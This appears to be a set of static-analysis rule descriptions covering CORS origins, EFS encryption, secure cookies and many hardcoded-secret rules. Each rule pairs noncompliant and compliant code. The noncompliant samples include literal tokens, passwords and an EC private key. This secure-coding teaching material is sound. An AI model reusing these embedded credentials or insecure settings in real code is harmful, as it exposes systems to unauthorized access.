const srv = http.createServer((req, res) => {
  res.writeHead(200, { 'Access-Control-Allow-Origin': 'trustedwebsite.com' }); // Compliant
  res.end('ok');
});
srv.listen(3000);

Express.js framework with cors middleware:

const cors = require('cors');

let corsOptions = {
  origin: 'trustedwebsite.com' // Compliant
};

let app = express();
app.use(cors(corsOptions));

User-controlled origin validated with an allow-list:

function (req, res) {
  const origin = req.header('Origin');

  if (trustedOrigins.indexOf(origin) >= 0) {
    res.setHeader('Access-Control-Allow-Origin', origin);
  }
};

See

javascript:S6332

Amazon Elastic File System (EFS) is a serverless file system that does not require provisioning or managing storage. Stored files can be automatically encrypted by the service. In the case that adversaries gain physical access to the storage medium or otherwise leak a message they are not able to access the data.

Ask Yourself Whether

  • The file system contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EFS file systems that contain sensitive information. Encryption and decryption are handled transparently by EFS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_efs.FileSystem

import { FileSystem } from 'aws-cdk-lib/aws-efs';

new FileSystem(this, 'unencrypted-explicit', {
    vpc: new Vpc(this, 'VPC'),
    encrypted: false // Sensitive
});

For aws_cdk.aws_efs.CfnFileSystem

import { CfnFileSystem } from 'aws-cdk-lib/aws-efs';

new CfnFileSystem(this, 'unencrypted-implicit-cfn', {
}); // Sensitive as encryption is disabled by default

Compliant Solution

For aws_cdk.aws_efs.FileSystem

import { FileSystem } from 'aws-cdk-lib/aws-efs';

new FileSystem(this, 'encrypted-explicit', {
    vpc: new Vpc(this, 'VPC'),
    encrypted: true
});

For aws_cdk.aws_efs.CfnFileSystem

import { CfnFileSystem } from 'aws-cdk-lib/aws-efs';

new CfnFileSystem(this, 'encrypted-explicit-cfn', {
    encrypted: true
});

See

javascript:S2092

When a cookie is protected with the secure attribute set to true it will not be send by the browser over an unencrypted HTTP request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.

Ask Yourself Whether

  • the cookie is for instance a session-cookie not designed to be sent over non-HTTPS communication.
  • it’s not sure that the website contains mixed content or not (ie HTTPS everywhere or not)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to use HTTPs everywhere so setting the secure flag to true should be the default behaviour when creating cookies.
  • Set the secure flag to true for session-cookies.

Sensitive Code Example

cookie-session module:

let session = cookieSession({
  secure: false,// Sensitive
});  // Sensitive

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    secure: false // Sensitive
  }
}));

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  secure: false // Sensitive
}); // Sensitive

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { secure: false }}); // Sensitive

Compliant Solution

cookie-session module:

let session = cookieSession({
  secure: true,// Compliant
});  // Compliant

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    secure: true // Compliant
  }
}));

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  secure: true // Compliant
}); // Compliant

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { secure: true }}); // Compliant

See

secrets:S6701

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Telegram bot keys are used to authenticate and authorize a bot to interact with the Telegram Bot API. These keys are essentially access tokens that allow the bot to send and receive messages, manage groups and channels, and perform other actions on behalf of the bot.

If a Telegram bot key is accidentally exposed to an unintended audience, the primary concern is that unauthorized individuals may gain access to the bot’s functionalities and data. This could result in misuse or abuse of the bot’s capabilities. For instance, unauthorized users could send unsolicited messages, spam users, or engage in other disruptive activities using the bot.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("api_token", "7299363101:AAWJlilLyeMaKgTTrrfsyrtxDqqI-cdI-TF")

Compliant solution

props.set("api_token", System.getenv("API_TOKEN"))

Resources

Standards

secrets:S6700

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

A RapidAPI key is a unique identifier that allows you to access and use APIs provided by RapidAPI. This key is used to track your API usage, manage your subscriptions, and ensure that you have the necessary permissions to access the APIs you are using. One RapidAPI key can be used to authenticate against a set of multiple other third-party services, depending on the key entitlement.

If a RapidAPI key leaks to an unintended audience, it can have several potential consequences. Especially, attackers may use the leaked key to access and utilize the APIs associated with that key without permission. This can result in unauthorized usage of API services, potentially leading to misuse, abuse, or excessive consumption of resources.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

RapidAPI services include an audit trail feature that can be used to audit malicious use of the compromised key.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("rapidapi_key", "6f1bbe24b9mshcbb5030202794a4p18f7d0jsndd55ab0f981d")

Compliant solution

props.set("rapidapi_key", System.getenv("rapidapi_key"))

Resources

Standards

Documentation

secrets:S6689

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

GitHub tokens are used for authentication and authorization purposes when interacting with the GitHub API. They serve as a way to identify and authenticate users or applications that are making requests to the GitHub API.

The consequences vary greatly depending on the situation and the secret-exposed audience. Still, two main scenarios should be considered.

Financial loss

Financial losses can occur when a secret is used to access a paid third-party-provided service and is disclosed as part of the source code of client applications. Having the secret, each user of the application will be able to use it without limit to use the third party service to their own need, including in a way that was not expected.

This additional use of the secret will lead to added costs with the service provider.

Moreover, when rate or volume limiting is set up on the provider side, this additional use can prevent the regular operation of the affected application. This might result in a partial denial of service for all the application’s users.

Application’s security downgrade

A downgrade can happen when the disclosed secret is used to protect security-sensitive assets or features of the application. Depending on the affected asset or feature, the practical impact can range from a sensitive information leak to a complete takeover of the application, its hosting server or another linked component.

For example, an application that would disclose a secret used to sign user authentication tokens would be at risk of user identity impersonation. An attacker accessing the leaked secret could sign session tokens for arbitrary users and take over their privileges and entitlements.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("token", "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")

Compliant solution

props.set("token", System.getenv("TOKEN"))

Resources

Standards

Documentation

GitHub documentation - Managing your personal access tokens

secrets:S6703

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Passwords are often used to authenticate users against database engines. They are associated with user accounts that are granted specific permissions over the database and its hosted data.

If a database password leaks to an unintended audience, it can have serious consequences for the security of your database instance, the data stored within it, and the applications that rely on it.

Compromise of sensitive data

If the affected service is used to store or process personally identifiable information or other sensitive data, attackers knowing an authentication secret could be able to access it. Depending on the type of data that is compromised, it could lead to privacy violations, identity theft, financial loss, or other negative outcomes.

In most cases, a company suffering a sensitive data compromise will face a reputational loss when the security issue is publicly disclosed.

Security downgrade

Applications relying on a database instance can suffer a security downgrade if an access password is leaked to attackers. Depending on the purposes the application uses the database for, consequences can range from low-severity issues, like defacement, to complete compromise.

For example, if the database instance is used as part of the authentication process of an application, attackers with access to the database will likely be able to bypass this security mechanism.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

public static string ConnectionString = "server=database-server;uid=user;pwd=P@ssw0rd;database=ProductionData";

Compliant solution

public static string ConnectionString = String.format(
    "server=database-server;uid=user;pwd=%s;database=ProductionData",
    System.getenv("DB_PASSWORD")
)

Resources

Standards

secrets:S6702

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

A SonarQube token is a unique key that serves as an authentication mechanism for accessing the SonarQube platform’s APIs. It is used to securely authenticate and authorize external tools or services to interact with SonarQube.

Tokens are typically generated for specific users or applications and can be configured with different levels of access permissions. By using a token, external tools or services can perform actions such as analyzing code, retrieving analysis results, creating projects, or managing quality profiles within SonarQube.

If a SonarQube token leaks to an unintended audience, it can pose a security risk to the SonarQube instance and the associated projects. Attackers may use the leaked token to gain unauthorized access to the SonarQube instance. They can potentially view sensitive information, modify project settings, or perform other dangerous actions.

Additionally, attackers with access to a token can modify code analysis results. This can lead to false positives or negatives in the analysis, compromising the accuracy and reliability of the platform.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

The SonarQube audit log can be downloaded from the product web interface and can be used to audit the malicious use of the compromised key. This feature is available starting with SonarQube Enterprise Edition.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("sonar_secret", "squ_b4556a16fa2d28519d2451a911d2e073024010bc")

Compliant solution

props.set("sonar_secret", System.getenv("SONAR_SECRET"))

Resources

Standards

Documentation

secrets:S6686

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

If a Clarifai API key leaks to an unintended audience, it could potentially lead to unauthorized access to the Clarifai account and its associated data. This could result in the compromise of sensitive data or financial loss.

Financial loss

Financial losses can occur when a secret is used to access a paid third-party-provided service and is disclosed as part of the source code of client applications. Having the secret, each user of the application will be able to use it without limit to use the third party service to their own need, including in a way that was not expected.

This additional use of the secret will lead to added costs with the service provider.

Moreover, when rate or volume limiting is set up on the provider side, this additional use can prevent the regular operation of the affected application. This might result in a partial denial of service for all the application’s users.

Compromise of sensitive data

If the affected service is used to store or process personally identifiable information or other sensitive data, attackers knowing an authentication secret could be able to access it. Depending on the type of data that is compromised, it could lead to privacy violations, identity theft, financial loss, or other negative outcomes.

In most cases, a company suffering a sensitive data compromise will face a reputational loss when the security issue is publicly disclosed.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

from clarifai_grpc.grpc.api.status import status_code_pb2

metadata = (('authorization','Key d819f799b90bc8dbaffd83661782dbb7'),)

Compliant solution

import os
from clarifai_grpc.grpc.api.status import status_code_pb2

metadata = (('authorization',os.environ["CLARIFAI_API_KEY"]),)

Resources

Standards

secrets:S6688

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

A Facebook application secret key is a unique authentication token assigned to a Facebook application. It is used to authenticate and authorize the application to access Facebook’s APIs and services. This key is required to perform actions on Facebook API, such as retrieving user data, posting on behalf of users, or accessing various Facebook features.

If a Facebook application secret key leaks to an unintended audience, it can have serious security-related consequences both for the associated Facebook application and its users. Especially, attackers knowing an application’s secret key will be able to access users' data that the application has been granted access to.

This can represent a severe confidentiality loss for Personally Identifiable Information. This might be against national regulatory requirements in some countries.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("facebook_secret", "a569a8eee3802560e1416edbc4ee119d")

Compliant solution

props.set("facebook_secret", System.getenv("FACEBOOK_SECRET"))

Resources

Standards

Documentation

secrets:S6687

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

If a Django secret key leaks to an unintended audience, it can have serious security implications for the corresponding application. The secret key is used to sign cookies and other sensitive data so that an attacker could potentially use it to perform malicious actions.

For example, an attacker could use the secret key to create their own cookies that appear to be legitimate, allowing them to bypass authentication and gain access to sensitive data or functionality.

In the worst-case scenario, an attacker could be able to execute arbitrary code on the application and take over its hosting server.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

In Django, changing the secret value is sufficient to invalidate any data that it protected. It is important to not add the revoked secret to the SECRET_KEY_FALLBACKS list. Doing so would not prevent previously protected data from being used.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

SECRET_KEY = 'r&lvybzry1*k+qq)=x-!=0yd5l5#1gxzk!82@ru25*ntos3_9^'

Compliant solution

import os

SECRET_KEY = os.environ["SECRET_KEY"]

Resources

Standards

Documentation

secrets:S6705

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

An OpenWeather API key is a unique identifier that allows you to access the OpenWeatherMap API. The OpenWeatherMap API provides weather data and forecasts for various locations worldwide.

If an OpenWeather API key leaks to an unintended audience, it can have several security consequences. Attackers may use the leaked API key to access the OpenWeatherMap API and consume the weather data without proper authorization. This can lead to excessive usage, potentially exceeding the API rate limits, or violating the terms of service.

Moreover, depending on the pricing model of the corresponding OpenWeather account, unauthorized usage of the leaked API key can result in unexpected charges or increased costs. Attackers may consume a large amount of data or make excessive requests, leading to additional expenses for the API key owner.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

url = "http://api.openweathermap.org/data/2.5/weather?units=imperial&appid=ae73acab47d0fc4b71b634d943b00518&q="

Compliant solution

import os
token = os.environ["OW_TOKEN"]

uri = "http://api.openweathermap.org/data/2.5/weather?units=imperial&appid={token}&q="

Resources

Standards

Documentation

OpenWeather Documentation - API keys

secrets:S6704

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Riot API keys are used to access the Riot Games API, which provides developers with programmatic access to various data and services related to Riot Games' products, such as League of Legends. These API keys are used to authenticate and authorize requests made to the API, allowing developers to retrieve game data, player statistics, match history, and other related information.

If a Riot API key is leaked to an unintended audience, it can have significant consequences. One of the main risks is unauthorized access. The unintended audience may exploit the leaked API key to gain entry to the Riot Games API. This can result in the unauthorized retrieval of sensitive data and misuse of services provided by the API. It poses a serious security threat as it allows individuals to access information that they should not have access to, potentially compromising the privacy and integrity of the data.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("api_key", "RGAPI-924549e3-31a9-406e-9e92-25ed41206dce")

Compliant solution

props.set("api_key", System.getenv("API_KEY"))

Resources

Standards

secrets:S6706

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

A cryptographic private key is a piece of sensitive information that is used in asymmetric cryptography. They are used in conjunction with public keys to secure communications and authenticate digital signatures.

Private keys can be used to achieve two main cryptographic operations, encryption or digital signature. Those operations are the basis of multiple higher-level security mechanisms such as:

  • User authentication
  • Servers authentication, for example in the X509 trust model
  • E-mail encryption

Disclosing a cryptographic private key to an unintended audience can have severe security consequences. The exact impact will vary depending on the role of the key and the assets it protects.

For example, if the key is used in conjunction with an X509 certificate to authenticate a web server as part of TLS communications, attackers will be able to impersonate that server. This leads to Man-In-The-Middle-Attacks that would affect both the confidentiality and integrity of the communications from clients to that server.

If the key was used as part of e-mail protocols, attackers might be able to send e-mails on behalf of the key owner or decrypt previously encrypted emails. This might lead to sensitive information disclosure and reputation loss.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

In most cases, if the key is used as part of a larger trust model (X509, PGP, etc), it is necessary to issue and publish a revocation certificate. Doing so will ensure that all people and assets that rely on this key for security operations are aware of its compromise and stop trusting it.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

private_key = "-----BEGIN EC PRIVATE KEY-----" \
    "MF8CAQEEGEfVxjrMPigNhGP6DqH6DPeUZPbaoaCCXaAKBggqhkjOPQMBAaE0AzIA" \
    "BCIxho34upZyXDi/AUy/TBisGeh4yKJN7pit9Z+nKs4QajVy97X8W9JdySlbWeRt" \
    "2w==" \
    "-----END EC PRIVATE KEY-----"

Compliant solution

with open("/path/to/private.key","r") as key_file:
    private_key = key_file.read()

Resources

Standards

secrets:S6684

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Azure Subscription Keys are used to authenticate and authorize access to Azure resources and services. These keys are unique identifiers that are associated with an Azure subscription and are used to control access to resources such as virtual machines, storage accounts, and databases. Subscription keys are typically used in API requests to Azure services, and they help ensure that only authorized users and applications can access and modify resources within an Azure subscription.

If an Azure Subscription Key is leaked to an unintended audience, it can pose a significant security risk to the Azure subscription and the resources it contains. An attacker who gains access to a subscription key can use it to authenticate and access resources within the subscription, potentially causing data breaches, data loss, or other malicious activities.

Depending on the level of access granted by the subscription key, an attacker could potentially create, modify, or delete resources within the subscription, or even take control of the entire subscription. This could result in significant financial losses, reputational damage, and legal liabilities for the organization that owns the subscription.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

Microsoft Azure provides an activity log that can be used to audit the access to the API.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("subscription_key", "efbb1a98f026d061464af685cd16dcd3")

Compliant solution

props.set("subscription_key", System.getenv("SUBSCRIPTION_KEY"))

Resources

Standards

Documentation

secrets:S6338

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Azure Storage Account Keys are used to authenticate and authorize access to Azure Storage resources, such as blobs, queues, tables, and files. These keys are used to authenticate requests made against the storage account.

If an Azure Storage Account Key is leaked to an unintended audience, it can pose a significant security risk to your Azure Storage account.

An attacker with access to your storage account key can potentially access and modify all the data stored in your storage account. They can also create new resources, delete existing ones, and perform other actions that can compromise the integrity and confidentiality of your data.

In addition, an attacker with access to your storage account key can also incur charges on your account by creating and using resources, which can result in unexpected billing charges.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("storage_key", "4dVw+l0W8My+FwuZ08dWXn+gHxcmBtS7esLAQSrm6/Om3jeyUKKGMkfAh38kWZlItThQYsg31v23A0w/uVP4pg==")

Compliant solution

props.set("storage_key", System.getenv("STORAGE_KEY"))

Resources

Standards

Documentation

secrets:S6337

Why is this an issue?

IBM API keys are used to authenticate applications that consume IBM Cloud APIs.

If your application interacts with IBM then it requires credentials to access all the resources it needs to function properly. Resources that can be accessed depend on the permissions granted to the account. These credentials may authenticate a user who has unrestricted access to all resources in your account, including billing information.

Recommended Secure Coding Practices

Only administrators should have access to the IBM API keys used by your application.

As a consequence, IBM API keys should not be stored along with the application code as they could be disclosed to a large audience or could be made public.

IBM API keys should be stored outside of the code in a file that is never committed to your application code repository.

If possible, a better alternative is to use your cloud provider’s service for managing secrets. On IBM Cloud this service is called Secrets Manager.

When credentials are disclosed in the application code, consider them as compromised and revoke them immediately.

In addition to secure storage, it’s important to apply restrictions to API keys in order to mitigate the impacts when they are discovered by malicious actors.

Resources

secrets:S6697

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Passwords in MySQL are used to authenticate users against the database engine. They are associated with user accounts that are granted specific permissions over the database and its hosted data.

If a MySQL password leaks to an unintended audience, it can have serious consequences for the security of your database, the data stored within it and the applications that rely on it.

Compromise of sensitive data

If the affected service is used to store or process personally identifiable information or other sensitive data, attackers knowing an authentication secret could be able to access it. Depending on the type of data that is compromised, it could lead to privacy violations, identity theft, financial loss, or other negative outcomes.

In most cases, a company suffering a sensitive data compromise will face a reputational loss when the security issue is publicly disclosed.

Security downgrade

Applications relying on a MySQL database instance can suffer a security downgrade if an access password is leaked to attackers. Depending on the purposes the application uses the database for, consequences can range from low-severity issues, like defacement, to complete compromise.

For example, if the MySQL instance is used as part of the authentication process of an application, attackers with access to the database will likely be able to bypass this security mechanism.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

General-purpose MySQL log files contain information about user authentication. They can be used to audit malicious use of password-leak-affected accounts.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

uri = "mysql://foouser:foopass@example.com/testdb"

Compliant solution

import os
user = os.environ["MYSQL_USER"]
password = os.environ["MYSQL_PASSWORD"]

uri = f"mysql://{user}:{password}@example.com/testdb"

Resources

Standards

secrets:S6334

Why is this an issue?

Google API keys are used to authenticate applications that consume Google Cloud APIs. They are especially useful for accessing public data anonymously (like Google Maps), and are used to associate API requests with your project for quota and billing.

API keys are not strictly secret as they are often embedded into client side code or mobile applications that consume Google Cloud APIs. Still, they should be secured and should never be treated as public information.

An unrestricted Google API key being disclosed in a public source code would be used by malicious actors to consume Google APIs on the behalf of your application. This will have a financial impact as your organisation will be billed for the data consumed by the malicious actor. If your account has enabled quota to cap the API consumption of your application, this quota can be exceeded, leaving your application unable to request the Google APIs it requires to function properly.

Recommended Secure Coding Practices

Only administrators should have access to the Google API keys used by your application.

As a consequence, Google API keys should not be stored along with the application code as they could be disclosed to a large audience or could be made public.

Google API keys should be stored outside of the code in a file that is never committed to your application code repository.

If possible, a better alternative is to use your cloud provider’s service for managing secrets. On Google Cloud this service is called Secret Manager.

